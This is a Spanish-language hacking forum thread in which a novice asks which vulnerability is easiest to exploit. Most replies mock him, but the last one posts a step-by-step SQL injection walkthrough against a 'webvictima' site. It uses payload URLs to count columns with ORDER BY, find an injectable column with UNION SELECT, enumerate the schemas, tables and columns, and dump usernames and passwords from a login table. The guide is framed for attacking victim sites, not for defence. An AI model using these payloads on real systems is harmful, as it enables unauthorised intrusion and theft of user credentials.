Quien me dice que vulnerabilbidad es mas facil de usar y cual es la mas dificil ?. Si tienes un manual sobre vulnerabilidades me ayudaria.

La vulnerabilidad más fácil de usar es la vulnerabilidad de la que más información posees... puesto que si no la conoces será jodida :).

Resumiendo, haz el favor de hacer preguntas coherentes. Por cierto:


Si tienes un manual sobre vulnerabilidades me ayudaria.

¿Por qué hay muchos que dirigiéndose al foro (mucha gente) dice cosas como "tienes" que va dirigido a una persona en concreto?

Un saludo.

www.rae.es <-- Empieza por este manual
chico1988 documentate mas sobre todo en concreto ,servicios y demas antes de preguntar. Explotar una vulnerabilidad no es algo nada facil sin unos conocimientos medios. Yo no tengo ni idea de como se hace y me manejo en este mundillo bastante.

PD: Mi post 666 The Number Of The Beast ^_____^

post 666 y escrito a las 0:00 uhhhh xDD

post 666 y escrito a las 0:00 uhhhh xDD

The daemons are no longer just in my mind xDDDD

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

Muchas gracias para la ayuda y para www.rae.es

En mi opinion las vulnerabilidades de sql son bastantes sencillas te dejo una guia :

primero debes probar si la web es vulnerable a nuestra injection para esto :
a la web se le agrega ' al final y quedara asi :
http://www.webvictima.org/article.php?id=10253'
si dice q hay un error en la base de datos sql ... quiere decir q es vulnerable

despues tenemos que fijarnos el numero de columnas para esto se ordenan de la siguiente forma :

http://www.webvictima.org/article.php?id=-10253 order by 1/*

y se va cambiando el numero hasta q diga :

Unknown column 'el numero q probaste' in 'order clause'


http://www.webvictima.org/article.php?id=-10253 order by 10/* no tira error
http://www.webvictima.org/article.php?id=-10253 order by 15/* aca te dice :
Unknown column '15' in 'order clause'

esto significa que la pagina tiene 14 columnas !
ahora necesitamos encontrar la columna "vulnerable" y escribis esto:

http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--

vas a ver dos numeros en la web, hay uno que esta remarcado o aparece arriba, esa es la columna que buscabamos, suponganse que la columna era la numero 2 quedaria asi ...

http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14 --

despues para ver la info de la base de datos necesitas escribir :

http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(schema_name),3,4,5,6,7,8, 9,10,11,12,13,14 from information_schema.schemata

ahora para averiguar como se llama la tabla donde se guardan los "logins" :

http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 ,10,11,12,13,14 from information_schema.tables where table_schema=database()--

en este caso se llamaba "login" xD :

http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8, 9,10,11,12,13,14 from information_schema.columns where table_name=login

si esa te da un error, no te preocupes intenta con esto :
http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8, 9,10,11,12,13,14 from information_schema.columns where table_name=char(108,111,103,105,110)

y ahi esta
ahora necesitas id,user,pass,user_id y password y la injection quedaria asi :

http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3 ,4,5,6,7,8,9,10,11,12,13,14 from login


z1dr0ff.- | HACKERS BROTHERS

esa es una injection entre tantas que hay :D